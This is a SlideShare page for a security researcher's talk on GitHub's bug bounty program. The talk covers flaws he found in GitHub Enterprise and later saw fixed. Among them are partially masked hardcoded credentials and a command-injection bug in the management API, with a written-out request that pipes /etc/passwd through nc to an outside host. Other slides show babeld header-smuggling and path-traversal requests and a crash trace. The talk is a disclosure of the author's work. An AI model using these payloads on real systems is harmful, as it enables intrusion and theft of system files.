defcon_kz, profile picture
Uploaded bydefcon_kz
323 views

Год в Github bugbounty, опыт участия

GitHub Bug Bounty Experience provides an overview of the author's experience participating in GitHub's bug bounty program. The summary includes 3 key points: 1) The author is an information security engineer who participated in GitHub's bug bounty program to find vulnerabilities for monetary rewards, as well as for fun and the challenge. 2) Through analyzing GitHub Enterprise's virtual machine images and Ruby applications, the author discovered several security issues like hardcoded credentials, lack of input validation, and potential for command injection. 3) By probing the Babeld SVN proxy service, the author found ways to bypass authentication and potentially cause denial of service through excessive requests.

Embed presentation

Download to read offline
GitHub Bug Bounty Experience Eldar Zaitov
Whoami • Information Security Engineer at Yandex • LC↯BC / MSLC / Smoked Chicken CTF team • CTFtime.org maintainer 2
What is Bug Bounty? Companies pay money for finding security vulnerabilities in their services/software • Google Vulnerability Reward Program (VRP) • Facebook • Yandex (“Охота за ошибками”) • … • https://hackerone.com/ 3
Why GitHub? • We use it • Blackbox -> Whitebox (GitHub Enterprise) • Fun • Bounty 4
01 › Available as Virtual Machine image at https://enterprise.github.com/ › 45 days trial included GitHub Enterprise
Virtual Machine Images • Hyper-V • OpenStack KVM () • VMWare ESXi • XEN 6
VMware ESXi to Virtual Box (RAW) 7 vbox-img convert --srcfilename ghe-disk1.vmdk --dstfilename ghe-disk1.raw --srcformat VMDK --dstformat RAW Красный цвет не правильный
8
9
haproxy babeld NGINX elasticsearch gpgverify codeload longpolld github app enterprise manage slumlord redis mysqlRuby C/C++ Golang Java alambic
11 METHOD /path?querystring HTTP/1.1rn Host: hostnamern Connection: closern rnrn BODY Method: • GET • POST • PUT • DELETE • HEAD • …
Haproxy • HTTP • HTTPS • TCP 12
Babeld • SSH (libssh) • GIT (libgit) • SVN • HTTP (curl) 13
Slumlord • Subversion (SVN) protocol emulator acl ua_svn hdr_reg(User-Agent) -i ^SVN • No internal auth: HTTP_HUB_LOGIN HTTP_HUB_PATH 14
NGINX • Github Pages • Main Unicorns + private mode • Avatars • Enterprise Manage • Render • Media 15
02 Ruby apps
Blackbox -> Whitebox 17 require "ruby_concealer.so“ _ruby_concealer__ "xx9CrxCCMOx830x18x00xE0x17xC4x96x8Fx96x0Fx85mxCERx92xC5,Frx 17xB3xF81x0F"tx8EbexA1#x1Ex86']2x0F^<x18xBDxF8xDBxF5xF9x01xCF rxA6xA8xB2x1FfGxC8%1xDEJ0XxC1xF4@xCC}bxAAxDFx06x8Ax92x13axB 8xF1xxD2xCELJxE9@x9CxC7xB1xCDxF6xBEK% xEFx86x81Ux13v!qbxF3x15xD1xDDfPmxB2xD0xDC'wx01"x16vxACxFFcxB Dx14xF0xF5xF1"xE6x90'2|xEEx11xF5<xE8xC0xCCexBCxDAUQx99x19x 03x15x81O.xADx16x87xE8pxB4xF8xF4NxABxFBx1Ex0Evx8BNxE5xD9x9Ah xF6YxA9xA0txC6xDA[!4xE9ox85Mx7FxDESfxC0x9FxD4x04xFBxBBxC6x91S] xD3x86}{x9BxF8xB5xCBbxD9]axC7x89xEAx97ixD2x92Qx1Ax8CuxC9x91 x83xA3xD7?txA5&xA9" Красный цвет не правильный
ruby_concealer.so 18
ruby_concealer.so 19
20 # # Seriously, CC @github/appsec and @github/dotcom-security # if you need to touch this file # class ApplicationController after_filter :set_html_safe private # Overrides default CSP with the preview policy if enabled for current_user # # Returns nothing. def set_security_headers if preview_features? SecureHeaders.use_secure_headers_override(request, :preview_policy) end …
Main GitHub application • 1.5M+ LOC • Sinatra • Secure randoms, MsgPack serializer • Pretty clean code 21
Hardcoded credentials 22 auth = "apt:6YLkX******h0zXf" github_package_host = if hostname.end_with?(".iad.github.net") "packages.iad.github.net" else "packages-ext.iad.github.net" end set_up_source :id => "github", :deb => "https://#{auth}@#{github_package_host}/github-precise precise main", :key => "https://#{auth}@#{github_package_host}/pubkey.gpg?OCC30EA6" end Красный цвет не правильный
Hardcoded credentials 23 uri = URI.parse("https://secure.braintreepaymentgateway.com/api/transact.php") http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_PEER if Rails.production? http.ca_file = "/usr/lib/ssl/certs/ca-certificates.crt" end params = { "transactionid" => transaction_id, "username" => "github", "password" => "g********6", … Красный цвет не правильный
Enterprise manage app • 8k+ LOC • The code is a mess 24
enterprise-manage/current/lib/manage/api.rb 25 get "/cluster-preflight" do command = "sudo /usr/bin/env CLUSTER_ROLE=#{params[:type]} /usr/local/share/enterprise/ghe-preflight-check“ if system(command) status 200 else status 400 `#{command}` end end Красный цвет не правильный
26 GET /setup/api/cluster- preflight?type=x%3Bcat+%2Fetc%2Fpasswd+%7C+nc+kyprizel.net+1114%3B HTTP/1.1 Host: 10.0.0.22:8443 Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
27 get "/cluster-preflight“ do role = params[:type] cluster_roles = %w(git web job mysql elasticsearch redis memcache metrics pages storage) if cluster_roles.include?(role) output = IO.popen(["sudo", "/usr/bin/env", "CLUSTER_ROLE=#{role}", "/usr/local/share/enterprise/ghe-preflight-check"]) { |io| io.read } if $?.exitstatus == 0 status 200 else status 400 output end else …
03 › Binary › Edge Binary world
csgtools 29 Constructive Solid Geometry GEM https://github.com/sshirokov/csgtool
30
31
src/util.c 32 assert_mem(line = calloc(strlen(read_buffer) + 1, sizeof(char))); strncpy(line, read_buffer, strlen(read_buffer)); // See if we need to finish reading the line while(line[strlen(line) - 1] != 'n') { rc = fgets(read_buffer, sizeof(read_buffer), f); if((rc == NULL) && feof(f)) { // We got everything that we can get, so we'll // call it a "line" break; } … Красный цвет не правильный
src/util.c 33 assert_mem(line = calloc(strlen(read_buffer) + 1, sizeof(char))); strncpy(line, read_buffer, strlen(read_buffer)); // See if we need to finish reading the line while(strlen(line) && line[strlen(line) - 1] != 'n') { rc = fgets(read_buffer, sizeof(read_buffer), f); if((rc == NULL) && feof(f)) { // We got everything that we can get, so we'll // call it a "line" break; } … Красный цвет не правильный
Babeld as SVN proxy 34 haproxy babeld github app slumlord POST /auth GET /repo
Babeld SVN auth 35 POST /auth/ HTTP/1.1 Host: local.github.test Content-Type: application/x-www-form-urlencoded Content-Length: 123 username=xxx&password=xxx&domain=local.github.test
Babeld 36 GET /AAAAx512/BBBBx512/ HTTP/1.1 Host: local.github.test Host: someother.host Authorization: Basic … User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 Accept-Encoding: gzip DAV: http://subversion.tigris.org/xmlns/dav/svn/depth DAV: http://subversion.tigris.org/xmlns/dav/svn/mergeinfo DAV: http://subversion.tigris.org/xmlns/dav/svn/log-revprops Connection: close
Babeld SVN auth 37 POST /auth/ HTTP/1.1 Host: local.github.test Content-Type: multipart/form-data Content-Length: 123 username=xxx&password=xxx&domain=someother.host
Babeld DoS 38 GET /AAAAx512/BBBBx512/ HTTP/1.1 Host: local.github.test Host: someother.host Authorization: Basic … X-GITHUB-REQUEST-ID: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 Accept-Encoding: gzip DAV: http://subversion.tigris.org/xmlns/dav/svn/depth DAV: http://subversion.tigris.org/xmlns/dav/svn/mergeinfo DAV: http://subversion.tigris.org/xmlns/dav/svn/log-revprops Connection: close
39 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7fbdfb6a923e <_IO_vfprintf_internal+126>: mov QWORD PTR [rbp-0x450],rax 0x7fbdfb6a9245 <_IO_vfprintf_internal+133>: mov rax,QWORD PTR [r15+0x10] 0x7fbdfb6a9249 <_IO_vfprintf_internal+137>: mov QWORD PTR [rbp-0x448],rax => 0x7fbdfb6a9250 <_IO_vfprintf_internal+144>: call 0x7fbdfb6ef750 <strchrnul> 0x7fbdfb6a9255 <_IO_vfprintf_internal+149>: and r13d,0x8000 0x7fbdfb6a925c <_IO_vfprintf_internal+156>: mov QWORD PTR [rbp-0x4b8],rax 0x7fbdfb6a9263 <_IO_vfprintf_internal+163>: mov QWORD PTR [rbp-0x4a0],rax 0x7fbdfb6a926a <_IO_vfprintf_internal+170>: je 0x7fbdfb6a92f0 <_IO_vfprintf_internal+304> Guessed arguments: arg[0]: 0x44bc45 ("duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ") arg[1]: 0x25 ('%')
40 gdb-peda$ bt #0 _IO_vfprintf_internal (s=s@entry=0x7fbdfc8224d0, format=format@entry=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ", ap=ap@entry=0x7fbdfc822638) at vfprintf.c:1315 #1 0x00007fbdfb6d5409 in _IO_vsnprintf (string=0x7fbdfc8228ef "", maxlen=<optimized out>, format=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ", args=args@entry=0x7fbdfc822638) at vsnprintf.c:119 #2 0x00007fbdfb6b3e22 in __snprintf (s=<optimized out>, maxlen=<optimized out>, format=<optimized out>) at snprintf.c:33 #3 0x0000000000417314 in log_with_timestamp (fmt=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ") at log.c:83 ...
41 ... #250 0x0000000000417b8f in log_with_timestamp (fmt=0x44bc45 "duration_ms=%f fs_sent=%lu fs_recv=%lu client_recv=%lu client_sent=%lu ") at log.c:212 #251 0x000000000041272b in http_generic_client_thread (ctx=0x44bc45, handler=0x191) at http-server.c:303 #252 0x000000000041886b in http_svn_client_thread (arg=<optimized out>) at http- server-svn.c:42 #253 0x00007fbdfba160a4 in start_thread (arg=0x7fbdfc8e1700) at pthread_create.c:309 #254 0x00007fbdfb74b5dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111
Babeld SVN auth • Login • User • Push-URL • Commit-URL • Hub-Path 42
Babeld SVN proxy 43 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: kyprizel@yandex.ru Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285
44
45
46
47
Whitelisted headers 48 GET /kyprizel/reponame/ HTTP/1.0 Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980
49 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: kyprizel@yandex.ru Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980
50 GET /kyprizel/reponame/ HTTP/1.0 Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980
51 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: kyprizel@yandex.ru Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980
52 GET /kyprizel/reponame/ HTTP/1.0 Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980 User-Agent: AAAAx980 … rnrn HUB-login: any-special-chars-here'"- Hub-SVN-Map-Push-URL: ?/../../../../../targetuser/private Hub-SVN-Commit-URL: ?/../../../../../targetuser/private Hub-Path: ./../arbitary
53 GET /kyprizel/reponame/ HTTP/1.0 Hub-Path: /data/repositories/4/nw/45/c4/8c/9/9.git Hub-SVN-Map-Push-URL: http://127.0.0.1:3037/kyprizel/reponame Hub-SVN-Commit-URL: http://127.0.0.1:3033/kyprizel/reponame Hub-Login: kyprizel Hub-User: kyprizel Hub-Email: kyprizel@yandex.ru Hub-Timezone: Europe/Moscow Host: localtest.github Authorization: Basic CREDENTIALS_HERE== User-Agent: SVN/1.9.4 (x64-microsoft-windows) serf/1.3.8 TortoiseSVN-1.9.4.27285 User-Agent: AAAAx980 User-Agent: AAAAx980 …
54 User-Agent: AAAAx340 HUB-login: any-special-chars-here'"- Hub-SVN-Map-Push-URL: ?/../../../../../targetuser/private Hub-SVN-Commit-URL: ?/../../../../../targetuser/private Hub-Path: ./../arbitrary We control headers rnrn We also control request body
55 ::ffff:127.0.0.1 - kyprizel,special-chars-here'"- [21/Jan/2017:00:04:44 +0000] - "GET /kyprizel/reponame/ HTTP/1.0" 500 5 0.0027 at=exception class=Rugged::OSError message="Failed to resolve path '/data/repositories/4/nw/45/c4/8c/9/9.git,./../arbitary': No such file or directory“
kyprizel Süraqtar? Eldar Zaitov

More Related Content

PPTX
OpenStack Day 2 Operations (Toronto)
byDirk Wallerstorfer
 
PPTX
OpenStack Day 2 Operations
byDirk Wallerstorfer
 
PDF
Linux Hardening - Made Easy
byGuy Barnhart-Magen
 
DOC
X64服务器 lnmp服务器部署标准 new
byYiwei Ma
 
PPT
101 4.3 control mounting and unmounting of filesystems v2
byAcácio Oliveira
 
PPT
4.3 control mounting and unmounting of filesystems v2
byAcácio Oliveira
 
DOCX
Proxy server ubuntu 12.04
byTio Aldiansyah
 
PDF
How to install OpenStack MITAKA --allinone - cheat sheet -
byNaoto MATSUMOTO
 
OpenStack Day 2 Operations (Toronto)
byDirk Wallerstorfer
 
OpenStack Day 2 Operations
byDirk Wallerstorfer
 
Linux Hardening - Made Easy
byGuy Barnhart-Magen
 
X64服务器 lnmp服务器部署标准 new
byYiwei Ma
 
101 4.3 control mounting and unmounting of filesystems v2
byAcácio Oliveira
 
4.3 control mounting and unmounting of filesystems v2
byAcácio Oliveira
 
Proxy server ubuntu 12.04
byTio Aldiansyah
 
How to install OpenStack MITAKA --allinone - cheat sheet -
byNaoto MATSUMOTO
 

What's hot

PPTX
10 Tips for AIX Security
byHelpSystems
 
PDF
Mise en place d'un client VPN l2tp IPsec sous docker
byNicolas Trauwaen
 
PPT
Brief summary-standard-password-hashes-Aix-FreeBSD-Linux-Solaris-HP-UX-May-20...
byCircling Cycle
 
PPT
101 4.3 control mounting and unmounting of filesystems
byAcácio Oliveira
 
PDF
3 manual installation of open vpn
byAshwajit Maske
 
PDF
strace for Perl Mongers
byNaosuke Yokoe
 
PDF
Booting directly opensuse iso file by grub2 @ openSUSE Asia Summit2015
byKentaro Hatori
 
PDF
Install and Configure Ubuntu for Hadoop Installation for beginners
byShilpa Hemaraj
 
PPTX
How to manage Microsoft Azure with open source
byTaehee Jang
 
PPTX
Great Hiroshima with Python 170830
byTakuya Nishimoto
 
PDF
PFIセミナー資料 H27.10.22
byYuya Takei
 
DOC
Installation of Subversion on Ubuntu,...
bywensheng wei
 
PDF
install mosquitto-auth-plug - cheat sheet -
byNaoto MATSUMOTO
 
PDF
Web Server Free Bsd
byKwanchai Charoennet
 
PDF
[ElasticStack]What happens when you visualize servers exposed to the world?
byMasamitsu Maehara
 
ODP
Puppet
byŁukasz Jagiełło
 
PDF
Openstack kilo installation using rdo
byNarasimha sreeram
 
PDF
repositor.io - Simple Repository Management
byinovex GmbH
 
PDF
J Ruby On Rails Presentation
byrailsconf
 
PDF
wordpress with nginx on virtualization, jail
byJongseok Choi
 
10 Tips for AIX Security
byHelpSystems
 
Mise en place d'un client VPN l2tp IPsec sous docker
byNicolas Trauwaen
 
Brief summary-standard-password-hashes-Aix-FreeBSD-Linux-Solaris-HP-UX-May-20...
byCircling Cycle
 
101 4.3 control mounting and unmounting of filesystems
byAcácio Oliveira
 
3 manual installation of open vpn
byAshwajit Maske
 
strace for Perl Mongers
byNaosuke Yokoe
 
Booting directly opensuse iso file by grub2 @ openSUSE Asia Summit2015
byKentaro Hatori
 
Install and Configure Ubuntu for Hadoop Installation for beginners
byShilpa Hemaraj
 
How to manage Microsoft Azure with open source
byTaehee Jang
 
Great Hiroshima with Python 170830
byTakuya Nishimoto
 
PFIセミナー資料 H27.10.22
byYuya Takei
 
Installation of Subversion on Ubuntu,...
bywensheng wei
 
install mosquitto-auth-plug - cheat sheet -
byNaoto MATSUMOTO
 
Web Server Free Bsd
byKwanchai Charoennet
 
[ElasticStack]What happens when you visualize servers exposed to the world?
byMasamitsu Maehara
 
Puppet
byŁukasz Jagiełło
 
Openstack kilo installation using rdo
byNarasimha sreeram
 
repositor.io - Simple Repository Management
byinovex GmbH
 
J Ruby On Rails Presentation
byrailsconf
 
wordpress with nginx on virtualization, jail
byJongseok Choi
 

Similar to Год в Github bugbounty, опыт участия

PDF
DevOops & How I hacked you DevopsDays DC June 2015
byChris Gates
 
PDF
Road to Opscon (Pisa '15) - DevOoops
byGianluca Varisco
 
KEY
Using and scaling Rack and Rack-based middleware
byAlona Mekhovova
 
KEY
Picking gem ruby for penetration testers
byPaolo Perego
 
PDF
Ruxmon feb 2013 what happened to rails
bysnyff
 
PPTX
GIT, RVM, FIRST HEROKU APP
byPavel Tyk
 
PPTX
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
byChris Gates
 
PDF
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
byCodemotion
 
PDF
LasCon 2014 DevOoops
byChris Gates
 
PPTX
Start tracking your ruby infrastructure
bySergiy Kukunin
 
KEY
Rails web api 开发
byshaokun
 
KEY
How I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine Yard
bySV Ruby on Rails Meetup
 
PPTX
Construindo APIs Usando Rails
byFernando Kakimoto
 
PDF
Intro to fog and openstack jp
bySatoshi Konno
 
PDF
Ruby MVC from scratch with Rack
byDonSchado
 
PDF
DevOoops (Increase awareness around DevOps infra security) - VoxxedDays Ticin...
byGianluca Varisco
 
PDF
Boxen: How to Manage an Army of Laptops
byPuppet
 
PDF
Broom not included curling the modern way
byDanielStenberg7
 
TXT
Analyze Git Commit
byguest387c12
 
TXT
Analyze Git Commit
byguest387c12
 
DevOops & How I hacked you DevopsDays DC June 2015
byChris Gates
 
Road to Opscon (Pisa '15) - DevOoops
byGianluca Varisco
 
Using and scaling Rack and Rack-based middleware
byAlona Mekhovova
 
Picking gem ruby for penetration testers
byPaolo Perego
 
Ruxmon feb 2013 what happened to rails
bysnyff
 
GIT, RVM, FIRST HEROKU APP
byPavel Tyk
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
byChris Gates
 
Gianluca Varisco - DevOoops (Increase awareness around DevOps infra security)
byCodemotion
 
LasCon 2014 DevOoops
byChris Gates
 
Start tracking your ruby infrastructure
bySergiy Kukunin
 
Rails web api 开发
byshaokun
 
How I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine Yard
bySV Ruby on Rails Meetup
 
Construindo APIs Usando Rails
byFernando Kakimoto
 
Intro to fog and openstack jp
bySatoshi Konno
 
Ruby MVC from scratch with Rack
byDonSchado
 
DevOoops (Increase awareness around DevOps infra security) - VoxxedDays Ticin...
byGianluca Varisco
 
Boxen: How to Manage an Army of Laptops
byPuppet
 
Broom not included curling the modern way
byDanielStenberg7
 
Analyze Git Commit
byguest387c12
 
Analyze Git Commit
byguest387c12
 

More from defcon_kz

PDF
Взлом Wi-Fi, теперь это мое! Теория и практические примеры по взлому Wi-Fi се...
bydefcon_kz
 
PDF
Двойное проникновение в корпоративные сети
bydefcon_kz
 
PDF
Полезные железки или к взлому GSM сетей готов! (Ербол)
bydefcon_kz
 
PDF
Маленький террорист или обзор возможностей Osmocom на мотороле с118
bydefcon_kz
 
PDF
ХАРДЕНИНГ (Аринов Ильяс (determination))
bydefcon_kz
 
PDF
The Atomic bomb for kiddies /exploring NSA exploits/
bydefcon_kz
 
PDF
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
bydefcon_kz
 
PDF
Бекдоры в пхп. Остаться незамеченным или проникновение без боли
bydefcon_kz
 
PDF
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
bydefcon_kz
 
PDF
Добро пожаловать в практическую безопасность (Сергей Белов)
bydefcon_kz
 
PDF
Linux for newbie hackers
bydefcon_kz
 
PDF
DEFCON и развитие информационной безопасности в стране
bydefcon_kz
 
PDF
Эксплуатация особенностей safari в социотехническом пентесте
bydefcon_kz
 
PDF
SECURITY CHECKLIST (Yevgeniy Goncharov aka xck, @sysadminkz)
bydefcon_kz
 
PPTX
Истекшие домены как киберугроза
bydefcon_kz
 
PDF
Как парализовать государство за 60 минут. (Сатиев Олжас)
bydefcon_kz
 
PDF
Внутренняя кухня информационных вбросов. Детектив по мотивам access_log (Анто...
bydefcon_kz
 
PDF
Высокоточное геопозиционирование или "Как уничтожить урожай марихуаны в два к...
bydefcon_kz
 
PDF
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)
bydefcon_kz
 
PDF
Фишинг (Стекольников Илья)
bydefcon_kz
 
Взлом Wi-Fi, теперь это мое! Теория и практические примеры по взлому Wi-Fi се...
bydefcon_kz
 
Двойное проникновение в корпоративные сети
bydefcon_kz
 
Полезные железки или к взлому GSM сетей готов! (Ербол)
bydefcon_kz
 
Маленький террорист или обзор возможностей Osmocom на мотороле с118
bydefcon_kz
 
ХАРДЕНИНГ (Аринов Ильяс (determination))
bydefcon_kz
 
The Atomic bomb for kiddies /exploring NSA exploits/
bydefcon_kz
 
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
bydefcon_kz
 
Бекдоры в пхп. Остаться незамеченным или проникновение без боли
bydefcon_kz
 
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
bydefcon_kz
 
Добро пожаловать в практическую безопасность (Сергей Белов)
bydefcon_kz
 
Linux for newbie hackers
bydefcon_kz
 
DEFCON и развитие информационной безопасности в стране
bydefcon_kz
 
Эксплуатация особенностей safari в социотехническом пентесте
bydefcon_kz
 
SECURITY CHECKLIST (Yevgeniy Goncharov aka xck, @sysadminkz)
bydefcon_kz
 
Истекшие домены как киберугроза
bydefcon_kz
 
Как парализовать государство за 60 минут. (Сатиев Олжас)
bydefcon_kz
 
Внутренняя кухня информационных вбросов. Детектив по мотивам access_log (Анто...
bydefcon_kz
 
Высокоточное геопозиционирование или "Как уничтожить урожай марихуаны в два к...
bydefcon_kz
 
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)
bydefcon_kz
 
Фишинг (Стекольников Илья)
bydefcon_kz
 

Recently uploaded

PPTX
tacacstrianingforwirelessnetworkengineers
byRaviTejaTammineni
 
PPTX
Overview-of-Anti-DDoS-Solutions-On-Premise-vs-On-Cloud.pptx
bybunhongkruy
 
PPTX
Number_Guessing_Game_Dsbsbssbzboc[1].pptx
byfbinsta3426
 
PPTX
A complete presentation on green computing
byreetapandey0007
 
PPTX
Why-Enterprises-Should-Build-Their-Own-Core-Network-and-Own-Their-ASN-and-Pub...
bybunhongkruy
 
PDF
Beacon Kit slides tech framework for world game (s) pdf
bySteven McGee
 
PPTX
Lesson 5 - Cyber attack Pt 3 - Matsuhashi.pptx
byOmar Fernandez
 
DOCX
BestMaker.ai: The Complete Brand Story, Founder's Vision, and AI Creative Pla...
byssuser7381d6
 
PPTX
Lesson 3 - Methodology of Green Computing - part2 - dela cruz.pptx
byOmar Fernandez
 
PDF
Key Duties and Roles of an Ecommerce Developer Singapore
byHachi Web Solution
 
PDF
Novi.LMS.Veseli.Cetvrtak.001 (1).pdfjjjj
byzoran radovic
 
PPTX
Dalhousie University Diploma
by文凭办理维多利亚大学购买毕业证学位认证知乎【Q微:1954292140】
 
PDF
Greetings All Students Update 3 by LDMMIA
by©LDMMIA, ©Reiki Yoga
 
PDF
LMS.Golconda.Vanredni.Broj.001.pdfjjjjjjj
byzoran radovic
 
PPTX
DEMO_ARTS for PowerPoint presentation of beed
bykeyebalagso23
 
tacacstrianingforwirelessnetworkengineers
byRaviTejaTammineni
 
Overview-of-Anti-DDoS-Solutions-On-Premise-vs-On-Cloud.pptx
bybunhongkruy
 
Number_Guessing_Game_Dsbsbssbzboc[1].pptx
byfbinsta3426
 
A complete presentation on green computing
byreetapandey0007
 
Why-Enterprises-Should-Build-Their-Own-Core-Network-and-Own-Their-ASN-and-Pub...
bybunhongkruy
 
Beacon Kit slides tech framework for world game (s) pdf
bySteven McGee
 
Lesson 5 - Cyber attack Pt 3 - Matsuhashi.pptx
byOmar Fernandez
 
BestMaker.ai: The Complete Brand Story, Founder's Vision, and AI Creative Pla...
byssuser7381d6
 
Lesson 3 - Methodology of Green Computing - part2 - dela cruz.pptx
byOmar Fernandez
 
Key Duties and Roles of an Ecommerce Developer Singapore
byHachi Web Solution
 
Novi.LMS.Veseli.Cetvrtak.001 (1).pdfjjjj
byzoran radovic
 
Dalhousie University Diploma
by文凭办理维多利亚大学购买毕业证学位认证知乎【Q微:1954292140】
 
Greetings All Students Update 3 by LDMMIA
by©LDMMIA, ©Reiki Yoga
 
LMS.Golconda.Vanredni.Broj.001.pdfjjjjjjj
byzoran radovic
 
DEMO_ARTS for PowerPoint presentation of beed
bykeyebalagso23
 

Год в Github bugbounty, опыт участия

  • 1.
    GitHub Bug BountyExperience Eldar Zaitov
  • 2.
    Whoami • Information SecurityEngineer at Yandex • LC↯BC / MSLC / Smoked Chicken CTF team • CTFtime.org maintainer 2
  • 3.
    What is BugBounty? Companies pay money for finding security vulnerabilities in their services/software • Google Vulnerability Reward Program (VRP) • Facebook • Yandex (“Охота за ошибками”) • … • https://hackerone.com/ 3
  • 4.
    Why GitHub? • Weuse it • Blackbox -> Whitebox (GitHub Enterprise) • Fun • Bounty 4
  • 5.
    01 › Available asVirtual Machine image at https://enterprise.github.com/ › 45 days trial included GitHub Enterprise
  • 6.
    Virtual Machine Images •Hyper-V • OpenStack KVM () • VMWare ESXi • XEN 6
  • 7.
    VMware ESXi toVirtual Box (RAW) 7 vbox-img convert --srcfilename ghe-disk1.vmdk --dstfilename ghe-disk1.raw --srcformat VMDK --dstformat RAW Красный цвет не правильный
  • 8.
  • 9.
  • 10.
  • 11.
    11 METHOD /path?querystring HTTP/1.1rn Host:hostnamern Connection: closern rnrn BODY Method: • GET • POST • PUT • DELETE • HEAD • …
  • 12.
  • 13.
    Babeld • SSH (libssh) •GIT (libgit) • SVN • HTTP (curl) 13
  • 14.
    Slumlord • Subversion (SVN)protocol emulator acl ua_svn hdr_reg(User-Agent) -i ^SVN • No internal auth: HTTP_HUB_LOGIN HTTP_HUB_PATH 14
  • 15.
    NGINX • Github Pages •Main Unicorns + private mode • Avatars • Enterprise Manage • Render • Media 15
  • 16.
  • 17.
    Blackbox -> Whitebox 17 require"ruby_concealer.so“ _ruby_concealer__ "xx9CrxCCMOx830x18x00xE0x17xC4x96x8Fx96x0Fx85mxCERx92xC5,Frx 17xB3xF81x0F"tx8EbexA1#x1Ex86']2x0F^<x18xBDxF8xDBxF5xF9x01xCF rxA6xA8xB2x1FfGxC8%1xDEJ0XxC1xF4@xCC}bxAAxDFx06x8Ax92x13axB 8xF1xxD2xCELJxE9@x9CxC7xB1xCDxF6xBEK% xEFx86x81Ux13v!qbxF3x15xD1xDDfPmxB2xD0xDC'wx01"x16vxACxFFcxB Dx14xF0xF5xF1"xE6x90'2|xEEx11xF5<xE8xC0xCCexBCxDAUQx99x19x 03x15x81O.xADx16x87xE8pxB4xF8xF4NxABxFBx1Ex0Evx8BNxE5xD9x9Ah xF6YxA9xA0txC6xDA[!4xE9ox85Mx7FxDESfxC0x9FxD4x04xFBxBBxC6x91S] xD3x86}{x9BxF8xB5xCBbxD9]axC7x89xEAx97ixD2x92Qx1Ax8CuxC9x91 x83xA3xD7?txA5&xA9" Красный цвет не правильный
  • 18.
  • 19.
  • 20.
    20 # # Seriously, CC@github/appsec and @github/dotcom-security # if you need to touch this file # class ApplicationController after_filter :set_html_safe private # Overrides default CSP with the preview policy if enabled for current_user # # Returns nothing. def set_security_headers if preview_features? SecureHeaders.use_secure_headers_override(request, :preview_policy) end …
  • 21.
    Main GitHub application •1.5M+ LOC • Sinatra • Secure randoms, MsgPack serializer • Pretty clean code 21
  • 22.
